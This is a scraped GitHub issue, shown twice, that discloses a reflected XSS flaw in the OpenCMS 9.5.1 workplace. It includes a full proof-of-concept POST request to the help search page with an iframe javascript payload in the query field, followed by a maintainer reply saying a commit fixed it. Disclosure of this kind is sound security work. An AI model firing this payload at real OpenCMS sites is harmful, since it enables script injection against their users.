Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
During some security testing I have identified the following XSS (reflected) vulnerabilities.The OpenCMS 9.5.1 workplace do not properly validate pages and parameters throughout the application.
Request Method: GET
Request Method: POST
POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1 .......................................................................................................................................................... .......................................................................................................................................................... Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Content-Length: 104
action=search&query=<iframe src=javascript:confirm(0) &index=German+online+help&searchPage=1&query2=1234
The text was updated successfully, but these errors were encountered:
These issues are fixed by commit a2e5cba.
Sorry, something went wrong.
No branches or pull requests
During some security testing I have identified the following XSS (reflected) vulnerabilities.The OpenCMS 9.5.1 workplace do not properly validate pages and parameters throughout the application.
Request Method: GET
Request Method: POST
POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
..........................................................................................................................................................
..........................................................................................................................................................
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104
action=search&query=<iframe src=javascript:confirm(0) &index=German+online+help&searchPage=1&query2=1234
The text was updated successfully, but these errors were encountered: